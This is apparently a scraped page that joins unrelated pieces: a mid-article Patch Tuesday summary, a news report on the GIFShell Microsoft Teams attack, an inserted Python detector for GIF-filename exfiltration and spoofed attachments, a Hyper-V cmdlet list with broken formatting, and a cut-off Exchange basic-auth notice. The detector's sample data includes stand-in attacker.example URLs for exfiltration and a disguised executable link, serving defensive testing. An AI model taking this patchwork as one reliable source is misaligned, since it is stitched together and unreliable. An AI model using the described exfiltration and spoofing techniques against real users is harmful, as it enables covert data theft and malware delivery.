“An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system,” Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It’s not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows –

  • CVE-2022-34718 (CVSS score: 9.8) – Windows TCP/IP Remote Code Execution Vulnerability
  • CVE-2022-34721 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34722 (CVSS score: 9.8) – Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
  • CVE-2022-34700 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
  • CVE-2022-35805 (CVSS score: 8.8) – Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

“An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation,” Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server and five privilege escalation bugs spanning Windows Kerberos and Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.


Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

“This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening,” Jogi said. “If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information.”

Software Patches from Other Vendors

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

GIFShell attack creates reverse shell using Microsoft Teams GIFs

A new attack technique called ‘GIFShell’ allows threat actors to abuse Microsoft Teams for novel phishing attacks and covertly executing commands to steal data using … GIFs.

The new attack scenario, shared exclusively with BleepingComputer, illustrates how attackers can string together numerous Microsoft Teams vulnerabilities and flaws to abuse legitimate Microsoft infrastructure to deliver malicious files, execute commands, and exfiltrate data via GIFs.

As the data exfiltration is done through Microsoft’s own servers, the traffic will be harder to detect by security software, which sees it as legitimate Microsoft Teams traffic.

Overall, the attack technique utilizes a variety of Microsoft Teams flaws and vulnerabilities:

  • Bypassing Microsoft Teams security controls allows external users to send attachments to Microsoft Teams users.
  • Modifying sent attachments makes users download files from an external URL rather than the generated SharePoint link.
  • Spoofing Microsoft Teams attachments makes them appear as harmless files while actually downloading a malicious executable or document.
  • Insecure URI schemes allow SMB NTLM hash theft or NTLM relay attacks.
  • Microsoft supports sending HTML base64 encoded GIFs, but does not scan the byte content of those GIFs. This allows malicious commands to be delivered within a normal-looking GIF.
  • Microsoft stores Teams messages in a parsable log file, located locally on the victim’s machine, and accessible by a low-privileged user.
  • Microsoft servers retrieve GIFs from remote servers, allowing data exfiltration via GIF filenames.

GIFShell – a reverse shell via GIFs

The new attack chain was discovered by cybersecurity consultant and pentester Bobby Rauch, who found numerous vulnerabilities, or flaws, in Microsoft Teams that can be chained together for command execution, data exfiltration, security control bypasses, and phishing attacks.

The main component of this attack is called ‘GIFShell,’ which allows an attacker to create a reverse shell that delivers malicious commands via base64 encoded GIFs in Teams, and exfiltrates the output through GIFs retrieved by Microsoft’s own infrastructure.

To create this reverse shell, the attacker must first convince a user to install a malicious stager that executes commands and uploads command output via a GIF URL to a Microsoft Teams webhook. Because phishing attacks are known to work well for infecting devices, Rauch came up with a novel phishing attack in Microsoft Teams to aid in this, which we describe in the next section.

GIFShell works by tricking a user into loading a malware executable called the “stager” on their device that will continuously scan the Microsoft Teams logs located at $HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log.

Microsoft Teams log folder (image; source: BleepingComputer)

All received messages are saved to these logs and are readable by all Windows user groups, meaning any malware on the device can access them.

Once the stager is in place, a threat actor would create their own Microsoft Teams tenant and contact other Microsoft Teams users outside of their organization. Attackers can easily achieve this as Microsoft allows external communication by default in Microsoft Teams.

To initiate the attack, the threat actor can use Rauch’s GIFShell Python script to send a message to a Microsoft Teams user that contains a specially crafted GIF. This legitimate GIF image has been modified to include commands to execute on a target’s machine.

When the target receives the message, the message and the GIF will be stored in the Microsoft Teams logs, which the malicious stager monitors.

When the stager detects a message with a GIF, it will extract the base64 encoded commands and execute them on the device. The GIFShell PoC will then take the output of the executed command and convert it to base64 text.

This base64 text is used as the filename for a remote GIF embedded in a Microsoft Teams Survey Card that the stager submits to the attacker’s public Microsoft Teams webhook.

As Microsoft Teams renders the card for the user, Microsoft’s servers will connect back to the attacker’s server URL to retrieve the GIF, which is named using the base64 encoded output of the executed command.

The GIFShell server running on the attacker’s server will receive this request and automatically decode the filename allowing the attackers to see the output of the command run on the victim’s device, as shown below.

For example, a retrieved GIF file named ‘dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif’ would decode to the output from the ‘whoami’ command executed on the infected device:

the user is: 
bobbyrauch6274\bobbyrauIkBáë

The threat actors can continue using the GIFShell server to send more GIFs, with further embedded commands to execute, and continue to receive the output when Microsoft attempts to retrieve the GIFs.

As these requests are made by the Microsoft website, urlp.asm.skype.com, used for regular Microsoft Teams communication, the traffic will be seen as legitimate and not detected by security software.

This allows the GIFShell attack to covertly exfiltrate data by mixing command output with legitimate Microsoft Teams network communication.

Even worse, as Microsoft Teams runs as a background process, it does not even need to be opened by the user to receive the attacker’s commands to execute.

The Microsoft Teams logs folder has also been found to be accessed by other programs, including business monitoring software such as Veriato, and potentially malware.

Microsoft acknowledged the research but said it would not be fixed as no security boundaries were bypassed.

“For this case, 72412, while this is great research and the engineering team will endeavor to improve these areas over time, these all are post exploitation and rely on a target already being compromised,” Microsoft told Rauch in an email shared with BleepingComputer.

“No security boundary appears to be bypassed. The product team will review the issue for potential future design changes, but this would not be tracked by the security team.”

Abusing Microsoft Teams for phishing attacks

As we previously said, the GIFShell attack requires the installation of an executable that executes commands received within the GIFs.

To aid in this, Rauch discovered Microsoft Teams flaws that allowed him to send malicious files to Teams users while spoofing them to look like harmless images in phishing attacks.

“This research demonstrates how it is possible to send highly convincing phishing attachments to victims through Microsoft Teams, without any way for a user to pre-screen whether the linked attachment is malicious or not,” explains Rauch in his writeup on the phishing method.

As we previously said in our discussion about GIFShell, Microsoft Teams allows users to message users in other tenants by default.

However, to prevent attackers from using Microsoft Teams in malware phishing attacks, Microsoft does not allow external users to send attachments to members of another tenant.

While playing with attachments in Microsoft Teams, Rauch discovered that when someone sends a file to another user in the same tenant, Microsoft generates a SharePoint link that is embedded in a JSON POST request to the Teams endpoint.

This JSON message, though, can then be modified to include any download link an attacker wants, even external links. Even worse, when the JSON is sent to a user via Teams’ conversation endpoint, it can also be used to send attachments as an external user, bypassing Microsoft Teams’ security restrictions.

For example, the JSON below has been modified to show a file name of Christmas_Party_Photo.jpeg but actually delivers a remote Christmas_Party_Photo.jpeg………….exe executable.

Microsoft Teams JSON to spoof an attachment (image; source: Bobby Rauch)

When the attachment is rendered in Teams, it is displayed as Christmas_Party_Photo.jpeg, and when highlighting it, it will continue to show that name, as shown below.

Spoofing a JPEG file (image; source: Bobby Rauch)

However, when the user clicks on the link, the attachment will download the executable from the attacker’s server.

In addition to using this Microsoft Teams spoofing phishing attack to send malicious files to external users, attackers can also modify the JSON to use Windows URIs, such as ms-excel:, to automatically launch an application to retrieve a document.

Rauch says this would allow attackers to trick users into connecting to a remote network share, letting threat actors steal NTLM hashes, or local attackers perform an NTLM relay attack to elevate privileges.

“These allowed, potentially unsafe URI schemes, combined with the lack of permissions enforcement and attachment spoofing vulnerabilities, can allow for a One Click RCE via NTLM relay in Microsoft Teams,” Rauch explains in his report on the spoofing attack.
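As an added, defender-side example (not code from the article, from Microsoft, or from Rauch's GIFShell PoC), the following Python inspects Teams card JSON for both patterns described above: a .gif URL whose filename decodes from base64 to readable text, as in the GIFShell exfiltration, and an attachment whose displayed name, link host or URI scheme disagrees with where the link really points, as in the spoofing attack. The card and attachment shapes, the `name`/`fileUrl` field names and the trusted SharePoint domain suffix are assumptions; the GIF filename is the one quoted in the article.

```python
# Added example for this page (not code from the article, Microsoft or Rauch's GIFShell PoC).
import base64
import binascii
import re
from urllib.parse import urlparse

# Standard and URL-safe base64 alphabets: a filename cannot contain "/", so an exfil
# tool could just as well use the URL-safe variant.
BASE64_CHARS = re.compile(r"^[A-Za-z0-9+/_-]+={0,2}$")
# Assumption: the tenant's own SharePoint/OneDrive domains, where a Teams-generated
# attachment link is expected to point.
TRUSTED_ATTACHMENT_SUFFIXES = (".sharepoint.com",)


def walk_strings(node):
    """Yield every string value in a nested JSON structure."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from walk_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from walk_strings(item)


def decode_base64_stem(stem, min_len=16):
    """Return decoded text if `stem` is base64 that decodes to readable text, else None."""
    # Smuggled command output is long, uses only the base64 alphabet and, unlike
    # random bytes, decodes to mostly printable text; all three are required.
    if len(stem) < min_len or not BASE64_CHARS.match(stem):
        return None
    body = stem.rstrip("=").replace("-", "+").replace("_", "/")
    if len(body) % 4 == 1:  # no valid base64 string has this length
        return None
    try:
        raw = base64.b64decode(body + "=" * (-len(body) % 4))
        text = raw.decode("utf-8")  # strict: random bytes are rarely valid UTF-8
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    readable = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    if not text or readable / len(text) < 0.9:
        return None
    return text


def find_gif_exfil(card):
    """Return (url, decoded_text) for each .gif URL in a card whose name decodes to text."""
    hits = []
    for value in walk_strings(card):
        if not value.lower().startswith(("http://", "https://")):
            continue
        filename = urlparse(value).path.rsplit("/", 1)[-1]
        if not filename.lower().endswith(".gif"):
            continue
        decoded = decode_base64_stem(filename[:-4])
        if decoded is not None:
            hits.append((value, decoded))
    return hits


def attachment_mismatch(attachment, name_key="name", url_key="fileUrl"):
    """Return the reasons an attachment card looks spoofed (empty if it looks consistent)."""
    # Hypothetical field names: the article shows the modified JSON only as an image,
    # so `name_key`/`url_key` are assumptions about where name and download link live.
    shown = attachment.get(name_key, "")
    parsed = urlparse(attachment.get(url_key, ""))
    reasons = []
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"non-web URI scheme {parsed.scheme!r}")  # e.g. ms-excel:
    elif not parsed.hostname or not parsed.hostname.endswith(TRUSTED_ATTACHMENT_SUFFIXES):
        reasons.append(f"external host {parsed.hostname!r}")
    real_name = parsed.path.rsplit("/", 1)[-1]
    shown_ext = shown.rsplit(".", 1)[-1].lower() if "." in shown else ""
    real_ext = real_name.rsplit(".", 1)[-1].lower() if "." in real_name else ""
    if shown_ext != real_ext:
        reasons.append(f"shown as .{shown_ext} but link targets .{real_ext}")
    return reasons


# Constructed sample inputs. The GIF name is the one quoted in the article; the card and
# attachment shapes only approximate Teams payloads and are not captures of real traffic.
SAMPLE_EXFIL_FILENAME = "dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif"
SAMPLE_CARD = {"type": "message", "attachments": [{
    "contentType": "application/vnd.microsoft.card.adaptive",
    "content": {"type": "AdaptiveCard", "body": [
        {"type": "TextBlock", "text": "Quick survey"},
        {"type": "Image", "url": "https://attacker.example/" + SAMPLE_EXFIL_FILENAME},
        {"type": "Image", "url": "https://cdn.example/team_lunch_photo%20(1).gif"},
    ]},
}]}
SAMPLE_SPOOFED_ATTACHMENT = {"name": "Christmas_Party_Photo.jpeg",
                             "fileUrl": "https://attacker.example/Christmas_Party_Photo.jpeg..............exe"}

if __name__ == "__main__":
    for url, text in find_gif_exfil(SAMPLE_CARD):
        print("GIFShell-style exfil candidate:", url, "->", repr(text))
    for reason in attachment_mismatch(SAMPLE_SPOOFED_ATTACHMENT):
        print("Spoofed attachment:", reason)
```

The same checks apply to webhook POST bodies captured at an egress proxy, where the Survey Card the stager submits is visible before Microsoft's servers fetch the GIF.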

Microsoft not immediately fixing bugs

Rauch told BleepingComputer that he disclosed the flaws to Microsoft in May and June of 2022, and despite Microsoft saying they were valid issues, they decided not to fix them immediately.

When BleepingComputer contacted Microsoft about why the bugs were not fixed, we were not surprised by their response regarding the GIFShell attack technique, as it requires the device to already be compromised with malware.

“This type of phishing is important to be aware of and as always, we recommend that users practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers.

We’ve assessed the techniques reported by this researcher and have determined that the two mentioned do not meet the bar for an urgent security fix. We’re constantly looking at new ways to better resist phishing to help ensure customer security and may take action in a future release to help mitigate this technique.” – a Microsoft spokesperson.

However, we were surprised that Microsoft did not consider the ability of external attackers to bypass security controls and send attachments to another tenant as something that should be immediately fixed.

Furthermore, not immediately fixing the ability to modify JSON attachment cards so that Microsoft Teams recipients could be tricked to download files from remote URLs was also surprising.

However, Microsoft has left the door open to resolving these issues, telling BleepingComputer that they may be serviced in future versions.

“Some lower severity vulnerabilities that don’t pose an immediate risk to customers are not prioritized for an immediate security update, but will be considered for the next version or release of Windows,” explained Microsoft in a statement to BleepingComputer.

Source :
https://www.bleepingcomputer.com/news/security/gifshell-attack-creates-reverse-shell-using-microsoft-teams-gifs/

PowerShell – Hyper-V Cmdlets


  • Add-VMDvdDrive: Adds a DVD drive to a virtual machine.
  • Add-VMFibreChannelHba: Adds a virtual Fibre Channel host bus adapter to a virtual machine.
  • Add-VMGroupMember: Adds group members to a virtual machine group.
  • Add-VMHardDiskDrive: Adds a hard disk drive to a virtual machine.
  • Add-VMMigrationNetwork: Adds a network for virtual machine migration on one or more virtual machine hosts.
  • Add-VMNetworkAdapter: Adds a virtual network adapter to a virtual machine.
  • Add-VMNetworkAdapterAcl: Creates an ACL to apply to the traffic through a virtual machine network adapter.
  • Add-VMNetworkAdapterExtendedAcl: Creates an extended ACL for a virtual network adapter.
  • Add-VMRemoteFx3dVideoAdapter: Adds a RemoteFX video adapter in a virtual machine.
  • Add-VMScsiController: Adds a SCSI controller in a virtual machine.
  • Add-VMStoragePath: Adds a path to a storage resource pool.
  • Add-VMSwitch: Adds a virtual switch to an Ethernet resource pool.
  • Add-VMSwitchExtensionPortFeature: Adds a feature to a virtual network adapter.
  • Add-VMSwitchExtensionSwitchFeature: Adds a feature to a virtual switch.
  • Add-VMSwitchTeamMember: Adds members to a virtual switch team.
  • Add-VmNetworkAdapterRoutingDomainMapping: Adds a routing domain and virtual subnets to a virtual network adapter.
  • Checkpoint-VM: Creates a checkpoint of a virtual machine.
  • Compare-VM: Compares a virtual machine and a virtual machine host for compatibility, returning a compatibility report.
  • Complete-VMFailover: Completes a virtual machine’s failover process on the Replica server.
  • Connect-VMNetworkAdapter: Connects a virtual network adapter to a virtual switch.
  • Connect-VMSan: Associates a host bus adapter with a virtual storage area network (SAN).
  • Convert-VHD: Converts the format, version type, and block size of a virtual hard disk file.
  • Copy-VMFile: Copies a file to a virtual machine.
  • Debug-VM: Debugs a virtual machine.
  • Disable-VMConsoleSupport: Disables keyboard, video, and mouse for virtual machines.
  • Disable-VMEventing: Disables virtual machine eventing.
  • Disable-VMIntegrationService: Disables an integration service on a virtual machine.
  • Disable-VMMigration: Disables migration on one or more virtual machine hosts.
  • Disable-VMRemoteFXPhysicalVideoAdapter: Disables one or more RemoteFX physical video adapters from use with RemoteFX-enabled virtual machines.
  • Disable-VMResourceMetering: Disables collection of resource utilization data for a virtual machine or resource pool.
  • Disable-VMSwitchExtension: Disables one or more extensions on one or more virtual switches.
  • Disable-VMTPM: Disables TPM functionality on a virtual machine.
  • Disconnect-VMNetworkAdapter: Disconnects a virtual network adapter from a virtual switch or Ethernet resource pool.
  • Disconnect-VMSan: Removes a host bus adapter from a virtual storage area network (SAN).
  • Dismount-VHD: Dismounts a virtual hard disk.
  • Enable-VMConsoleSupport: Enables keyboard, video, and mouse for virtual machines.
  • Enable-VMEventing: Enables virtual machine eventing.
  • Enable-VMIntegrationService: Enables an integration service on a virtual machine.
  • Enable-VMMigration: Enables migration on one or more virtual machine hosts.
  • Enable-VMRemoteFXPhysicalVideoAdapter: Enables one or more RemoteFX physical video adapters for use with RemoteFX-enabled virtual machines.
  • Enable-VMReplication: Enables replication of a virtual machine.
  • Enable-VMResourceMetering: Collects resource utilization data for a virtual machine or resource pool.
  • Enable-VMSwitchExtension: Enables one or more extensions on one or more switches.
  • Enable-VMTPM: Enables TPM functionality on a virtual machine.
  • Export-VM: Exports a virtual machine to disk.
  • Export-VMSnapshot: Exports a virtual machine checkpoint to disk.
  • Get-VHD: Gets the virtual hard disk object associated with a virtual hard disk.
  • Get-VHDSet: Gets information about a VHD set.
  • Get-VHDSnapshot: Gets information about a checkpoint in a VHD set.
  • Get-VM: Gets the virtual machines from one or more Hyper-V hosts.
  • Get-VMBios: Gets the BIOS of a virtual machine or snapshot.
  • Get-VMComPort: Gets the COM ports of a virtual machine or snapshot.
  • Get-VMConnectAccess: Gets entries showing users and the virtual machines to which they can connect on one or more Hyper-V hosts.
  • Get-VMDvdDrive: Gets the DVD drives attached to a virtual machine or snapshot.
  • Get-VMFibreChannelHba: Gets the Fibre Channel host bus adapters associated with one or more virtual machines.
  • Get-VMFirmware: Gets the firmware configuration of a virtual machine.
  • Get-VMFloppyDiskDrive: Gets the floppy disk drives of a virtual machine or snapshot.
  • Get-VMGroup: Gets virtual machine groups.
  • Get-VMHardDiskDrive: Gets the virtual hard disk drives attached to one or more virtual machines.
  • Get-VMHost: Gets a Hyper-V host.
  • Get-VMHostCluster: Gets virtual machine host clusters.
  • Get-VMHostNumaNode: Gets the NUMA topology of a virtual machine host.
  • Get-VMHostNumaNodeStatus: Gets the status of the virtual machines on the non-uniform memory access (NUMA) nodes of a virtual machine host or hosts.
  • Get-VMHostSupportedVersion: Returns a list of virtual machine configuration versions that are supported on a host.
  • Get-VMIdeController: Gets the IDE controllers of a virtual machine or snapshot.
  • Get-VMIntegrationService: Gets the integration services of a virtual machine or snapshot.
  • Get-VMKeyProtector: Retrieves a key protector for a virtual machine.
  • Get-VMMemory: Gets the memory of a virtual machine or snapshot.
  • Get-VMMigrationNetwork: Gets the networks added for migration to one or more virtual machine hosts.
  • Get-VMNetworkAdapter: Gets the virtual network adapters of a virtual machine, snapshot, management operating system, or of a virtual machine and management operating system.
  • Get-VMNetworkAdapterAcl: Gets the ACLs configured for a virtual machine network adapter.
  • Get-VMNetworkAdapterExtendedAcl: Gets extended ACLs configured for a virtual network adapter.
  • Get-VMNetworkAdapterFailoverConfiguration: Gets the IP address of a virtual network adapter configured to be used when a virtual machine fails over.
  • Get-VMNetworkAdapterRoutingDomainMapping: Gets members of a routing domain.
  • Get-VMNetworkAdapterTeamMapping
  • Get-VMNetworkAdapterVlan: Gets the virtual LAN settings configured on a virtual network adapter.
  • Get-VMProcessor: Gets the processor of a virtual machine or snapshot.
  • Get-VMRemoteFXPhysicalVideoAdapter: Gets the RemoteFX physical graphics adapters on one or more Hyper-V hosts.
  • Get-VMRemoteFx3dVideoAdapter: Gets the RemoteFX video adapter of a virtual machine or snapshot.
  • Get-VMReplication: Gets the replication settings for a virtual machine.
  • Get-VMReplicationAuthorizationEntry: Gets the authorization entries of a Replica server.
  • Get-VMReplicationServer: Gets the replication and authentication settings of a Replica server.
  • Get-VMResourcePool: Gets the resource pools on one or more virtual machine hosts.
  • Get-VMSan: Gets the available virtual machine storage area networks on a Hyper-V host or hosts.
  • Get-VMScsiController: Gets the SCSI controllers of a virtual machine or snapshot.
  • Get-VMSecurity: Gets security information about a virtual machine.
  • Get-VMSnapshot: Gets the checkpoints associated with a virtual machine or checkpoint.
  • Get-VMStoragePath: Gets the storage paths in a storage resource pool.
  • Get-VMSwitch: Gets virtual switches from one or more virtual Hyper-V hosts.
  • Get-VMSwitchExtension: Gets the extensions on one or more virtual switches.
  • Get-VMSwitchExtensionPortData: Retrieves the status of a virtual switch extension feature applied to a virtual network adapter.
  • Get-VMSwitchExtensionPortFeature: Gets the features configured on a virtual network adapter.
  • Get-VMSwitchExtensionSwitchData: Gets the status of a virtual switch extension feature applied on a virtual switch.
  • Get-VMSwitchExtensionSwitchFeature: Gets the features configured on a virtual switch.
  • Get-VMSwitchTeam: Gets virtual switch teams from Hyper-V hosts.
  • Get-VMSystemSwitchExtension: Gets the switch extensions installed on a virtual machine host.
  • Get-VMSystemSwitchExtensionPortFeature: Gets the port-level features supported by virtual switch extensions on one or more Hyper-V hosts.
  • Get-VMSystemSwitchExtensionSwitchFeature: Gets the switch-level features on one or more Hyper-V hosts.
  • Get-VMVideo: Gets video settings for virtual machines.
  • Get-VmNetworkAdapterIsolation: Gets isolation settings for a virtual network adapter.
  • Grant-VMConnectAccess: Grants a user or users access to connect to a virtual machine or machines.
  • Import-VM: Imports a virtual machine from a file.
  • Import-VMInitialReplication: Imports initial replication files for a Replica virtual machine to complete the initial replication when using external media as the source.
  • Measure-VM: Reports resource utilization data for one or more virtual machines.
  • Measure-VMReplication: Gets replication statistics and information associated with a virtual machine.
  • Measure-VMResourcePool: Reports resource utilization data for one or more resource pools.
  • Merge-VHD: Merges virtual hard disks.
  • Mount-VHD: Mounts one or more virtual hard disks.
  • Move-VM: Moves a virtual machine to a new Hyper-V host.
  • Move-VMStorage: Moves the storage of a virtual machine.
  • New-VFD: Creates a virtual floppy disk.
  • New-VHD: Creates one or more new virtual hard disks.
  • New-VM: Creates a new virtual machine.
  • New-VMGroup: Creates a virtual machine group.
  • New-VMReplicationAuthorizationEntry: Creates a new authorization entry that allows one or more primary servers to replicate data to a specified Replica server.
  • New-VMResourcePool: Creates a resource pool.
  • New-VMSan: Creates a new virtual storage area network (SAN) on a Hyper-V host.
  • New-VMSwitch: Creates a new virtual switch on one or more virtual machine hosts.
  • Optimize-VHD: Optimizes the allocation of space used by virtual hard disk files, except for fixed virtual hard disks.
  • Optimize-VHDSet: Optimizes VHD set files.
  • Remove-VHDSnapshot: Removes a checkpoint from a VHD set file.
  • Remove-VM: Deletes a virtual machine.
  • Remove-VMDvdDrive: Deletes a DVD drive from a virtual machine.
  • Remove-VMFibreChannelHba: Removes a Fibre Channel host bus adapter from a virtual machine.
  • Remove-VMGroup: Removes a virtual machine group.
  • Remove-VMGroupMember: Removes members from a virtual machine group.
  • Remove-VMHardDiskDrive: Deletes a hard disk drive from a virtual machine.
  • Remove-VMMigrationNetwork: Removes a network from use with migration.
  • Remove-VMNetworkAdapter: Removes one or more virtual network adapters from a virtual machine.
  • Remove-VMNetworkAdapterAcl: Removes an ACL applied to the traffic through a virtual network adapter.
  • Remove-VMNetworkAdapterExtendedAcl: Removes an extended ACL for a virtual network adapter.
  • Remove-VMNetworkAdapterRoutingDomainMapping: Removes a routing domain from a virtual network adapter.
  • Remove-VMNetworkAdapterTeamMapping
  • Remove-VMRemoteFx3dVideoAdapter: Removes a RemoteFX 3D video adapter from a virtual machine.
  • Remove-VMReplication: Removes the replication relationship of a virtual machine.
  • Remove-VMReplicationAuthorizationEntry: Removes an authorization entry from a Replica server.
  • Remove-VMResourcePool: Deletes a resource pool from one or more virtual machine hosts.
  • Remove-VMSan: Removes a virtual storage area network (SAN) from a Hyper-V host.
  • Remove-VMSavedState: Deletes the saved state of a saved virtual machine.
  • Remove-VMScsiController: Removes a SCSI controller from a virtual machine.
  • Remove-VMSnapshot: Deletes a virtual machine checkpoint.
  • Remove-VMStoragePath: Removes a path from a storage resource pool.
  • Remove-VMSwitch: Deletes a virtual switch.
  • Remove-VMSwitchExtensionPortFeature: Removes a feature from a virtual network adapter.
  • Remove-VMSwitchExtensionSwitchFeature: Removes a feature from a virtual switch.
  • Remove-VMSwitchTeamMember: Removes a member from a virtual machine switch team.
  • Rename-VM: Renames a virtual machine.
  • Rename-VMGroup: Renames virtual machine groups.
  • Rename-VMNetworkAdapter: Renames a virtual network adapter on a virtual machine or on the management operating system.
  • Rename-VMResourcePool: Renames a resource pool on one or more Hyper-V hosts.
  • Rename-VMSan: Renames a virtual storage area network (SAN).
  • Rename-VMSnapshot: Renames a virtual machine checkpoint.
  • Rename-VMSwitch: Renames a virtual switch.
  • Repair-VM: Repairs one or more virtual machines.
  • Reset-VMReplicationStatistics: Resets the replication statistics of a virtual machine.
  • Reset-VMResourceMetering: Resets the resource utilization data collected by Hyper-V resource metering.
  • Resize-VHD: Resizes a virtual hard disk.
  • Restart-VM: Restarts a virtual machine.
  • Restore-VMSnapshot: Restores a virtual machine checkpoint.
  • Resume-VM: Resumes a suspended (paused) virtual machine.
  • Resume-VMReplication: Resumes a virtual machine replication that is in a state of Paused, Error, Resynchronization Required, or Suspended.
  • Revoke-VMConnectAccess: Revokes access for one or more users to connect to one or more virtual machines.
  • Save-VM: Saves a virtual machine.
  • Set-VHD: Sets properties associated with a virtual hard disk.
  • Set-VM: Configures a virtual machine.
  • Set-VMBios: Configures the BIOS of a Generation 1 virtual machine.
  • Set-VMComPort: Configures the COM port of a virtual machine.
  • Set-VMDvdDrive: Configures a virtual DVD drive.
  • Set-VMFibreChannelHba: Configures a Fibre Channel host bus adapter on a virtual machine.
  • Set-VMFirmware: Sets the firmware configuration of a virtual machine.
  • Set-VMFloppyDiskDrive: Configures a virtual floppy disk drive.
  • Set-VMHardDiskDrive: Configures a virtual hard disk.
  • Set-VMHost: Configures a Hyper-V host.
  • Set-VMHostCluster: Configures a virtual machine host cluster.
  • Set-VMKeyProtector: Configures a key protector for a virtual machine.
  • Set-VMMemory: Configures the memory of a virtual machine.
  • Set-VMMigrationNetwork: Sets the subnet, subnet mask, and/or priority of a migration network.
  • Set-VMNetworkAdapter: Configures features of the virtual network adapter in a virtual machine or the management operating system.
  • Set-VMNetworkAdapterFailoverConfiguration: Configures the IP address of a virtual network adapter to be used when a virtual machine fails over.
  • Set-VMNetworkAdapterTeamMapping
  • Set-VMNetworkAdapterVlan: Configures the virtual LAN settings for the traffic through a virtual network adapter.
  • Set-VMProcessor: Configures one or more processors of a virtual machine.
  • Set-VMRemoteFx3dVideoAdapter: Configures the RemoteFX 3D video adapter of a virtual machine.
  • Set-VMReplication: Modifies the replication settings of a virtual machine.
  • Set-VMReplicationAuthorizationEntry: Modifies an authorization entry on a Replica server.
  • Set-VMReplicationServer: Configures a host as a Replica server.
  • Set-VMResourcePool: Sets the parent resource pool for a selected resource pool.
  • Set-VMSan: Configures a virtual storage area network (SAN) on one or more Hyper-V hosts.
  • Set-VMSecurity: Configures security settings for a virtual machine.
  • Set-VMSecurityPolicy: Configures the security policy for a virtual machine.
  • Set-VMSwitch: Configures a virtual switch.
  • Set-VMSwitchExtensionPortFeature: Configures a feature on a virtual network adapter.
Set-VMSwitchExtensionSwitchFeatureConfigures a feature on a virtual switch.
Set-VMSwitchTeamConfigures a virtual switch team.
Set-VMVideoConfigures video settings for virtual machines.
Set-VmNetworkAdapterIsolationModifies isolation settings for a virtual network adapter.
Set-VmNetworkAdapterRoutingDomainMappingSets virtual subnets on a routing domain.
Start-VMStarts a virtual machine.
Start-VMFailoverStarts failover on a virtual machine.
Start-VMInitialReplicationStarts replication of a virtual machine.
Start-VMTraceStarts tracing to a file.
Stop-VMShuts down, turns off, or saves a virtual machine.
Stop-VMFailoverStops failover of a virtual machine.
Stop-VMInitialReplicationStops an ongoing initial replication.
Stop-VMReplicationCancels an ongoing virtual machine resynchronization.
Stop-VMTraceStops tracing to file.
Suspend-VMSuspends, or pauses, a virtual machine.
Suspend-VMReplicationSuspends replication of a virtual machine.
Test-VHDTests a virtual hard disk for any problems that would make it unusable.
Test-VMNetworkAdapterTests connectivity between virtual machines.
Test-VMReplicationConnectionTests the connection between a primary server and a Replica server.
Update-VMVersionUpdates the version of virtual machines.

Source :
https://eddiejackson.net/wp/?page_id=26483

Basic Authentication Deprecation in Exchange Online – September 2022 Update

One month from today, we’re going to start to turn off basic auth for specific protocols in Exchange Online for customers who use them.

Since our first announcement nearly three years ago, we’ve seen millions of users move away from basic auth, and we’ve disabled it in millions of tenants to proactively protect them.

We’re not done yet though, and unfortunately usage isn’t yet at zero. Despite that, we will start to turn off basic auth for several protocols for tenants not previously disabled.

Starting October 1st, we will start to randomly select tenants and disable basic authentication access for MAPI, RPC, Offline Address Book (OAB), Exchange Web Services (EWS), POP, IMAP, Exchange ActiveSync (EAS), and Remote PowerShell. We will post a message to the Message Center 7 days prior, and we will post Service Health Dashboard notifications to each tenant on the day of the change.

We will not be disabling or changing any settings for SMTP AUTH.

If you have removed your dependency on basic auth, this will not affect your tenant or users. If you have not (or are not sure), check the Message Center for the latest data contained in the usage reports we have been sending monthly since October 2021. The data for August 2022 will be sent within the first few days of September.

What If You Are Not Ready for This Change?

We recognize that unfortunately there are still many tenants unprepared for this change. Despite multiple blog posts, Message Center posts, interruptions of service, and coverage via tweets, videos, conference presentations and more, some customers are still unaware this change is coming. There are also many customers aware of the deadline who simply haven’t done the necessary work to avoid an outage.

Our goal with this effort has only ever been to protect your data and accounts from the increasing number of attacks we see that are leveraging basic auth.

However, we understand that email is a mission-critical service for many of our customers and turning off basic auth for many of them could potentially be very impactful.

One-Time Re-Enablement

Today we are announcing an update to our plan to offer customers who are unaware or are not ready for this change.

